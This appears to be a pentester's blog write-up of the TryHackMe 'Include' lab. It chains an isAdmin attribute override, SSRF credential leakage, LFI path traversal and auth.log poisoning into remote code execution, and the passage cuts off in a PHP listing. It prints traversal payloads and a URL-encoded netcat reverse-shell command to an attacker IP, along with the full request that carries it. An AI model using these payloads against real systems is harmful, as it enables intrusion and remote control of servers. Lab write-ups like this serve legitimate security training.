    <span class="md-ellipsis">
      Service Enumeration
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Service Enumeration">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#ssh" class="md-nav__link">
    <span class="md-ellipsis">
      SSH
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#smtp" class="md-nav__link">
    <span class="md-ellipsis">
      SMTP
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#imappop3" class="md-nav__link">
    <span class="md-ellipsis">
      IMAP/POP3
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#exploitation" class="md-nav__link">
    <span class="md-ellipsis">
      Exploitation
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Exploitation">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#web" class="md-nav__link">
    <span class="md-ellipsis">
      Web
    </span>
  </a>
  
    <nav class="md-nav" aria-label="Web">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#http-port-4000" class="md-nav__link">
    <span class="md-ellipsis">
      HTTP - Port 4000
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#http-port-50000" class="md-nav__link">
    <span class="md-ellipsis">
      HTTP - Port 50000
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#additional-digging" class="md-nav__link">
    <span class="md-ellipsis">
      Additional Digging
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#resources" class="md-nav__link">
    <span class="md-ellipsis">
      Resources
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
  <div class="md-content md-content--post" data-md-component="content">
    <div class="md-sidebar md-sidebar--post" data-md-component="sidebar" data-md-type="navigation">
      <div class="md-sidebar__scrollwrap">
        <div class="md-sidebar__inner md-post">
          <nav class="md-nav md-nav--primary">
            <div class="md-post__back">
              <div class="md-nav__title md-nav__container">
                <a href="../../../index.html" class="md-nav__link">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
                  <span class="md-ellipsis">
                    Back to index
                  </span>
                </a>
              </div>
            </div>
            
              <div class="md-post__authors md-typeset">
                
                  <div class="md-profile md-post__profile">
                    <span class="md-author md-author--long">
                      <img src="https://avatars.githubusercontent.com/u/108031577?v=4" alt="Tom Fieber">
                    </span>
                    <span class="md-profile__description">
                      <strong>
                        
                          <a href="https://tomfieber.github.io">Tom Fieber</a>
                        
                      </strong>
                      <br>
                      Dad, husband, okay pentester
                    </span>
                  </div>
                
              </div>
            
            <ul class="md-post__meta md-nav__list">
              <li class="md-nav__item md-nav__item--section">
                <div class="md-post__title">
                  <span class="md-ellipsis">
                    Metadata
                  </span>
                </div>
                <nav class="md-nav">
                  <ul class="md-nav__list">
                    <li class="md-nav__item">
                      <div class="md-nav__link">
                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 19H5V8h14m-3-7v2H8V1H6v2H5c-1.11 0-2 .89-2 2v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2h-1V1m-1 11h-5v5h5z"/></svg>
                        <time datetime="2024-06-07 00:00:00+00:00" class="md-ellipsis">June 7, 2024</time>
                      </div>
                    </li>
                    
                    
                      <li class="md-nav__item">
                        <div class="md-nav__link">
                          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 3v15h3V3zm3 2 4 13 3-1-4-13zM5 5v13h3V5zM3 19v2h18v-2z"/></svg>
                          <span class="md-ellipsis">
                            in
                            
                              <a href="../../../category/writeups.html">writeups</a>, 
                              <a href="../../../category/tryhackme.html">tryhackme</a></span>
                        </div>
                      </li>
                    
                    
                      
                      <li class="md-nav__item">
                        <div class="md-nav__link">
                          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 20a8 8 0 0 0 8-8 8 8 0 0 0-8-8 8 8 0 0 0-8 8 8 8 0 0 0 8 8m0-18a10 10 0 0 1 10 10 10 10 0 0 1-10 10C6.47 22 2 17.5 2 12A10 10 0 0 1 12 2m.5 5v5.25l4.5 2.67-.75 1.23L11 13V7z"/></svg>
                          <span class="md-ellipsis">
                            
                              10 min read
                            
                          </span>
                        </div>
                      </li>
                    
                  </ul>
                </nav>
              </li>
            </ul>
            
          </nav>
          
        </div>
      </div>
    </div>
    <article class="md-content__inner md-typeset">
      
        <!--
  Copyright (c) 2016-2024 Martin Donath <martin.donath@squidfunk.com>

  Permission is hereby granted, free of charge, to any person obtaining a copy
  of this software and associated documentation files (the "Software"), to
  deal in the Software without restriction, including without limitation the
  rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
  sell copies of the Software, and to permit persons to whom the Software is
  furnished to do so, subject to the following conditions:

  The above copyright notice and this permission notice shall be included in
  all copies or substantial portions of the Software.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE
  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
  FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
  IN THE SOFTWARE.
-->

<!-- Content -->
<article class="md-content__inner md-typeset">
  
  <!-- Dynamic target input for pages that have the dynamic_target metadata -->
  

  <!-- Page content -->
  <h1 id="tryhackme-include">TryHackMe: Include<a class="headerlink" href="#tryhackme-include" title="Permanent link">&para;</a></h1>
<p>Include is a <strong>MEDIUM</strong> difficulty room on <a href="https://tryhackme.com/r/room/include">TryHackMe</a> that involves abusing a logic flaw to get access to an admin panel, leveraging an internal API to obtain credentials for another service via a Server-Side Request Forgery (SSRF), and then combining a Local File Inclusion (LFI) vulnerability with log poisoning to achieve Remote Code Execution (RCE) on the web server. It should be noted that a subscription to TryHackMe is required to play this room. </p>
<!-- more -->
<p><a class="glightbox" href="../../../images/tryhackme_include/include.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/tryhackme_include/include.png" /></a> </p>
<h3 id="walkthrough">Walkthrough<a class="headerlink" href="#walkthrough" title="Permanent link">&para;</a></h3>
<h4 id="enumeration">Enumeration<a class="headerlink" href="#enumeration" title="Permanent link">&para;</a></h4>
<h5 id="port-scanning">Port Scanning<a class="headerlink" href="#port-scanning" title="Permanent link">&para;</a></h5>
<p>The initial Nmap scan shows 8 ports open, as follows:</p>
<div class="highlight"><pre><span></span><code><span class="go">22/open/tcp/ssh/OpenSSH8.2p1Ubuntu4ubuntu0.11(UbuntuLinux;protocol2.0)</span>
<span class="go">25/open/tcp/smtp/Postfixsmtpd</span>
<span class="go">110/open/tcp/pop3/Dovecotpop3d</span>
<span class="go">143/open/tcp/imap/Dovecotimapd(Ubuntu)</span>
<span class="go">993/open/tcp/ssl|imap/Dovecotimapd(Ubuntu)</span>
<span class="go">995/open/tcp/ssl|pop3/Dovecotpop3d</span>
<span class="go">4000/open/tcp/http/Node.js(Expressmiddleware)</span>
<span class="go">50000/open/tcp/http/Apachehttpd2.4.41((Ubuntu))</span>
</code></pre></div>
<h5 id="service-enumeration">Service Enumeration<a class="headerlink" href="#service-enumeration" title="Permanent link">&para;</a></h5>
<h6 id="ssh">SSH<a class="headerlink" href="#ssh" title="Permanent link">&para;</a></h6>
<p>This isn't an ancient version of SSH, so it's unlikely that we'll find an exploitable condition in SSH itself, but it's worth checking to see if the service accepts password authentication and/or if a weak password might be in use. </p>
<p>Password authentication is supported, however the initial check for weak passwords failed. </p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span>ssh<span class="w"> </span>root@<span class="nv">$ip</span>

<span class="go">The authenticity of host &#39;10.10.172.107 (10.10.172.107)&#39; can&#39;t be established.</span>
<span class="go">ED25519 key fingerprint is SHA256:uURSOQLABB+Das+Emk8jQtlj9stf8TDyVdiz6DZmjoU.</span>
<span class="go">This key is not known by any other names.</span>
<span class="go">Are you sure you want to continue connecting (yes/no/[fingerprint])? yes</span>
<span class="go">Warning: Permanently added &#39;10.10.172.107&#39; (ED25519) to the list of known hosts.</span>
<span class="go">root@10.10.172.107&#39;s password:</span>
<span class="go">Permission denied, please try again.</span>
<span class="go">root@10.10.172.107&#39;s password:</span>
<span class="go">Permission denied, please try again.</span>
<span class="go">root@10.10.172.107&#39;s password:</span>
<span class="go">root@10.10.172.107: Permission denied (publickey,password).</span>
</code></pre></div>
<p>We can move on from SSH for now.</p>
<h5 id="smtp">SMTP<a class="headerlink" href="#smtp" title="Permanent link">&para;</a></h5>
<p>Using <code>telnet</code> to connect to the SMTP service, we're able to enumerate valid users on the system, as shown below. Note the message after attempting to send mail to a user that does not exist ("doesnotexist") compared to the message received after entering a user that does exist ("root").</p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span>telnet<span class="w"> </span><span class="nv">$ip</span><span class="w"> </span><span class="m">25</span>

<span class="go">Trying 10.10.172.107...</span>
<span class="go">Connected to 10.10.172.107.</span>
<span class="go">Escape character is &#39;^]&#39;.</span>
<span class="go">220 mail.filepath.lab ESMTP Postfix (Ubuntu)</span>
<span class="go">HELO x</span>
<span class="go">250 mail.filepath.lab</span>
<span class="go">MAIL FROM: attacker@example.com</span>
<span class="go">250 2.1.0 Ok</span>
<span class="go">RCPT TO: doesnotexist</span>
<span class="go">550 5.1.1 &lt;doesnotexist&gt;: Recipient address rejected: User unknown in local recipient table</span>
<span class="go">RCPT TO: root</span>
<span class="go">250 2.1.5 Ok</span>
</code></pre></div>
<p>We can use a tool like <code>smtp-user-enum</code> to try to gather a list of valid usernames. I ran this using the <code>john.txt</code> wordlist from <a href="https://github.com/insidetrust/statistically-likely-usernames">statistically-likely-usernames</a>. As shown below, the we've found two usernames: <code>joshua</code> and <code>charles</code>.</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240606074209.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240606074209.png" /></a></p>
<p>Let's hold onto this for now and come back to it later. </p>
<h5 id="imappop3">IMAP/POP3<a class="headerlink" href="#imappop3" title="Permanent link">&para;</a></h5>
<p>We can grab the IMAP banner with netcat.</p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span>nc<span class="w"> </span>-nv<span class="w"> </span><span class="nv">$ip</span><span class="w"> </span><span class="m">143</span>

<span class="go">Connection to 10.10.102.86 143 port [tcp/*] succeeded!</span>
<span class="go">* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS LOGINDISABLED] Dovecot (Ubuntu) ready.</span>
</code></pre></div>
<p>Trying to log in, we get an error that plaintext authentication is not authorized over the unencrypted channel (good!). </p>
<div class="highlight"><pre><span></span><code><span class="go">A1 LOGIN th0m12 th0m12</span>
<span class="go">* BAD [ALERT] Plaintext authentication not allowed without SSL/TLS, but your client did it anyway. If anyone was listening, the password was exposed.</span>
<span class="go">A1 NO [PRIVACYREQUIRED] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.</span>
</code></pre></div>
<p>Connecting with openssl allows entering credentials, but since we don't have creds there's not much we can access. If nothing pans out with the other services, we might circle back to this to try brute forcing the credentials using the two usernames we've already enumerated. </p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span>openssl<span class="w"> </span>s_client<span class="w"> </span>-connect<span class="w"> </span><span class="nv">$ip</span>:993<span class="w"> </span>-quiet

<span class="go">Can&#39;t use SSL_get_servername</span>
<span class="go">depth=0 CN = ip-10-10-31-82.eu-west-1.compute.internal</span>
<span class="go">verify error:num=18:self-signed certificate</span>
<span class="go">verify return:1</span>
<span class="go">depth=0 CN = ip-10-10-31-82.eu-west-1.compute.internal</span>
<span class="go">verify return:1</span>
<span class="go">* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN AUTH=LOGIN] Dovecot (Ubuntu) ready.</span>
<span class="go">A1 LOGIN th0m12 password</span>
<span class="go">A1 NO [AUTHENTICATIONFAILED] Authentication failed.</span>
<span class="go">A1 LIST &quot;&quot; *</span>
<span class="go">A1 BAD Error in IMAP command received by server.</span>
<span class="go">A1 SELECT Inbox</span>
<span class="go">A1 BAD Error in IMAP command received by server.</span>
</code></pre></div>
<p>Similarly, I didn't get anything from the POP3 service running on the server either.</p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span>openssl<span class="w"> </span>s_client<span class="w"> </span>-connect<span class="w"> </span><span class="nv">$ip</span>:995<span class="w"> </span>-crlf<span class="w"> </span>-quiet

<span class="go">Can&#39;t use SSL_get_servername</span>
<span class="go">depth=0 CN = ip-10-10-31-82.eu-west-1.compute.internal</span>
<span class="go">verify error:num=18:self-signed certificate</span>
<span class="go">verify return:1</span>
<span class="go">depth=0 CN = ip-10-10-31-82.eu-west-1.compute.internal</span>
<span class="go">verify return:1</span>
<span class="go">+OK Dovecot (Ubuntu) ready.</span>
<span class="go">user th0m12</span>
<span class="go">+OK</span>
<span class="go">pass Password1!</span>
<span class="go">-ERR [AUTH] Authentication failed.</span>
<span class="go">LIST</span>
<span class="go">-ERR Unknown command.</span>
<span class="go">RETR 1</span>
<span class="go">-ERR Unknown command.</span>
</code></pre></div>
<h3 id="exploitation">Exploitation<a class="headerlink" href="#exploitation" title="Permanent link">&para;</a></h3>
<h4 id="web">Web<a class="headerlink" href="#web" title="Permanent link">&para;</a></h4>
<h5 id="http-port-4000">HTTP - Port 4000<a class="headerlink" href="#http-port-4000" title="Permanent link">&para;</a></h5>
<p>After adding the IP to the <code>/etc/hosts</code> file with the command below we're able to browse to the first web app:</p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span><span class="nb">echo</span><span class="w"> </span>-n<span class="w"> </span><span class="s1">&#39;10.10.188.130\tinclude.thm&#39;</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>sudo<span class="w"> </span>tee<span class="w"> </span>-a<span class="w"> </span>/etc/hosts
</code></pre></div>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240606202332.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240606202332.png" /></a></p>
<p>After logging in with <code>guest:guest</code> we're greeted with a "Review App". </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240606202537.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240606202537.png" /></a></p>
<p>Looking at the "guest" profile, there are a number of different attributes, and it looks like we can recommend activities for the user.</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240606202756.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240606202756.png" /></a></p>
<p>Under the "Recommend an Activity to guest" heading, it's possible to add a new activity type and name. To start, I entered <code>test:test</code>. As shown below, this gets added as a new attribute. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240606203123.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240606203123.png" /></a></p>
<p>The attribute that sticks out the most is that <code>isAdmin: false</code>. It might be possible to overwrite the <code>isAdmin</code> value to give ourselves admin privileges.</p>
<p>After entering <code>isAdmin:true</code> in the recommend an activity section, we can see that our user is now an admin and we have access to some new menu options. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240606203355.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240606203355.png" /></a></p>
<p>Selecting the "API" option from the navigation bar brings up some API documentation listing endpoints on the localhost. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607074044.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607074044.png" /></a></p>
<p>On the settings page, there's an option to update the profile banner. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607074202.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607074202.png" /></a></p>
<p>This accepts a URL as input. It might be possible to use this to reach those API endpoints. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607074305.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607074305.png" /></a></p>
<p>When we enter that and hit "Update Banner Image", we get back the following response:</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607074354.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607074354.png" /></a></p>
<p>Looks like a base64-encoded string.</p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span><span class="nb">echo</span><span class="w"> </span><span class="s1">&#39;eyJSZXZpZXdBcHBVc2VybmFtZS[...SNIP...]N0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0=&#39;</span><span class="w"> </span><span class="p">|</span><span class="w"> </span>base64<span class="w"> </span>-d<span class="w"> </span><span class="p">|</span><span class="w"> </span>jq

<span class="go">{</span>
<span class="go">  &quot;ReviewAppUsername&quot;: &quot;admin&quot;,</span>
<span class="go">  &quot;ReviewAppPassword&quot;: &quot;[REDACTED]&quot;,</span>
<span class="go">  &quot;SysMonAppUsername&quot;: &quot;administrator&quot;,</span>
<span class="go">  &quot;SysMonAppPassword&quot;: &quot;[REDACTED]&quot;</span>
<span class="go">}</span>
</code></pre></div>
<h5 id="http-port-50000">HTTP - Port 50000<a class="headerlink" href="#http-port-50000" title="Permanent link">&para;</a></h5>
<p>Sweet. We've got a password that will allow us to log into the other web app on port 50000. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607074657.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607074657.png" /></a></p>
<p>After using those credentials to log in, we land on a dashboard that contains the first flag.</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607074913.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607074913.png" /></a></p>
<p>Notice in the source code for <code>dashboard.php</code>, the profile picture is sourced from <code>profile.php</code> using an <code>img</code> parameter. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607075320.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607075320.png" /></a></p>
<p>In fact, we can see this request in Burp Suite.</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607075442.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607075442.png" /></a></p>
<p>My first thought with this is testing for path traversal. Since I'm on Burp community edition with a significantly throttled intruder, I'm going to use <code>ffuf</code> for testing this quickly. Zapproxy, Caido, or other fuzzing tools will also probably work.</p>
<p>To make this work with <code>ffuf</code> I saved the request to a file and then replaced "profile.png" with "FUZZ", as shown below:</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607080247.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607080247.png" /></a></p>
<p>Having configured the request file, we can run <code>ffuf</code> against it. </p>
<div class="highlight"><pre><span></span><code><span class="gp">$ </span>ffuf<span class="w"> </span>-r<span class="w"> </span>-c<span class="w"> </span>-request<span class="w"> </span>req.txt<span class="w"> </span>-request-proto<span class="w"> </span><span class="s1">&#39;http&#39;</span><span class="w"> </span>-w<span class="w"> </span>/opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt<span class="w"> </span>-fs<span class="w"> </span><span class="m">0</span>


<span class="go">        /&#39;___\  /&#39;___\           /&#39;___\</span>
<span class="go">       /\ \__/ /\ \__/  __  __  /\ \__/</span>
<span class="go">       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\</span>
<span class="go">        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/</span>
<span class="go">         \ \_\   \ \_\  \ \____/  \ \_\</span>
<span class="go">          \/_/    \/_/   \/___/    \/_/</span>

<span class="go">       v2.1.0-dev</span>
<span class="go">________________________________________________</span>

<span class="go"> :: Method           : GET</span>
<span class="go"> :: URL              : http://include.thm:50000/profile.php?img=FUZZ</span>
<span class="go"> :: Wordlist         : FUZZ: /opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt</span>
<span class="go"> :: Header           : Cookie: PHPSESSID=gbvb62jo9gnq3vbbknsie463i7</span>
<span class="go"> :: Header           : X-PwnFox-Color: orange</span>
<span class="go"> :: Header           : Host: include.thm:50000</span>
<span class="go"> :: Header           : User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0</span>
<span class="go"> :: Header           : Accept: image/avif,image/webp,*/*</span>
<span class="go"> :: Header           : Accept-Language: en-US,en;q=0.5</span>
<span class="go"> :: Header           : Accept-Encoding: gzip, deflate, br</span>
<span class="go"> :: Header           : Connection: keep-alive</span>
<span class="go"> :: Header           : Referer: http://include.thm:50000/dashboard.php</span>
<span class="go"> :: Header           : Priority: u=4</span>
<span class="go"> :: Follow redirects : true</span>
<span class="go"> :: Calibration      : false</span>
<span class="go"> :: Timeout          : 10</span>
<span class="go"> :: Threads          : 40</span>
<span class="go"> :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500</span>
<span class="go"> :: Filter           : Response size: 0</span>
<span class="go">________________________________________________</span>

<span class="go">....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd [Status: 200, Size: 2231, Words: 20, Lines: 42, Duration: 191ms]</span>
<span class="go">....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd [Status: 200, Size: 2231, Words: 20, Lines: 42, Duration: 188ms]</span>
<span class="go">[...SNIP...]</span>
</code></pre></div>
<p>After fuzzing we find some path traversal sequences that work. Testing one of those in Burp, we find that it does in fact work to grab the <code>/etc/passwd</code> file. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607080714.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607080714.png" /></a></p>
<p>From here, we need to find a way to get RCE. Since we have an LFI vulnerability, as well as a couple services exposed on the server, my thought is log poisoning. </p>
<p>After some poking around, I found at least two that will probably work: <code>/var/log/auth.log</code> and <code>/var/log/mail.log</code>. </p>
<p>Looking at <code>auth.log</code>:</p>
<div class="highlight"><pre><span></span><code><span class="go">HTTP/1.1 200 OK</span>
<span class="go">Date: Fri, 07 Jun 2024 13:13:51 GMT</span>
<span class="go">Server: Apache/2.4.41 (Ubuntu)</span>
<span class="go">Expires: Thu, 19 Nov 1981 08:52:00 GMT</span>
<span class="go">Cache-Control: no-store, no-cache, must-revalidate</span>
<span class="go">Pragma: no-cache</span>
<span class="go">Vary: Accept-Encoding</span>
<span class="go">Content-Length: 719</span>
<span class="go">Keep-Alive: timeout=5, max=100</span>
<span class="go">Connection: Keep-Alive</span>
<span class="go">Content-Type: text/html; charset=UTF-8</span>


<span class="go">Jun  7 12:30:59 mail sshd[1853]: Server listening on 0.0.0.0 port 22.</span>
<span class="go">Jun  7 12:30:59 mail sshd[1853]: Server listening on :: port 22.</span>
<span class="go">Jun  7 12:34:35 mail auth: pam_unix(dovecot:auth): check pass; user unknown</span>
<span class="go">Jun  7 12:34:35 mail auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=th0m12 rhost=10.2.113.252 </span>
<span class="go">Jun  7 12:39:01 mail CRON[2009]: pam_unix(cron:session): session opened for user root by (uid=0)</span>
<span class="go">Jun  7 12:39:01 mail CRON[2009]: pam_unix(cron:session): session closed for user root</span>
<span class="go">Jun  7 13:09:01 mail CRON[2220]: pam_unix(cron:session): session opened for user root by (uid=0)</span>
<span class="go">Jun  7 13:09:01 mail CRON[2220]: pam_unix(cron:session): session closed for user root</span>
</code></pre></div>
<p>After attempting to SSH into the server, we can check the log again to see if the new entry is there. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607081809.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607081809.png" /></a></p>
<p>Perfect. Let's see if we can inject a PHP web shell here. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607081938.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607081938.png" /></a></p>
<p>Trying to use the standard SSH syntax doesn't work. However, it's possible to still poison the log using <code>NetExec</code> or <code>hydra</code>. Here, I used <code>NetExec</code>. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607082114.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607082114.png" /></a></p>
<p>After checking the log again along with the <code>id</code> command, we can see that we've got command execution. </p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607082700.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607082700.png" /></a></p>
<p>From here, you can either list the contents of the <code>/var/www/html/</code> directory from Burp repeater, or you can try to get a reverse shell and browse around a bit easier. The first time I did this room, I did it entirely in Burp, but for the purpose of this writeup, I'll test the reverse shell method.</p>
<p>Using the following URL-encoded command I was able to get a reverse shell. I used <a href="https://revshells.com">revshells.com</a> to generate this.</p>
<div class="highlight"><pre><span></span><code><span class="go">rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.2.113.252%209001%20%3E%2Ftmp%2Ff</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="go">GET /profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/auth.log&amp;cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.2.113.252%209001%20%3E%2Ftmp%2Ff HTTP/1.1</span>
<span class="go">Host: include.thm:50000</span>
<span class="go">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0</span>
<span class="go">Accept: image/avif,image/webp,*/*</span>
<span class="go">Accept-Language: en-US,en;q=0.5</span>
<span class="go">Accept-Encoding: gzip, deflate, br</span>
<span class="go">Connection: keep-alive</span>
<span class="go">Referer: http://include.thm:50000/dashboard.php</span>
<span class="go">Cookie: PHPSESSID=gbvb62jo9gnq3vbbknsie463i7</span>
<span class="go">X-PwnFox-Color: orange</span>
<span class="go">Priority: u=4</span>
</code></pre></div>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607083339.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607083339.png" /></a></p>
<p>Here is the "mystery" text file that will give us flag 2.</p>
<p><a class="glightbox" href="../../../images/screenshots/Pasted%20image%2020240607083503.png" data-type="image" data-width="auto" data-height="auto" data-desc-position="bottom"><img alt="" src="../../../images/screenshots/Pasted%20image%2020240607083503.png" /></a></p>
<h2 id="additional-digging">Additional Digging<a class="headerlink" href="#additional-digging" title="Permanent link">&para;</a></h2>
<p>Looking at the code for <code>profile.php</code>, we can see what's happening here.</p>
<div class="highlight"><pre><span></span><code><span class="cp">&lt;?php</span>
<span class="nb">session_start</span><span class="p">();</span>

<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]))</span> <span class="p">{</span>
    <span class="nb">header</span><span class="p">(</span><span class="s1">&#39;Location: login.php&#39;</span><span class="p">);</span>
    <span class="k">exit</span><span class="p">();</span>
<span class="p">}</span>

<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;img&#39;</span><span class="p">])){</span>
    <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;img&#39;</span><span class="p">];</span>
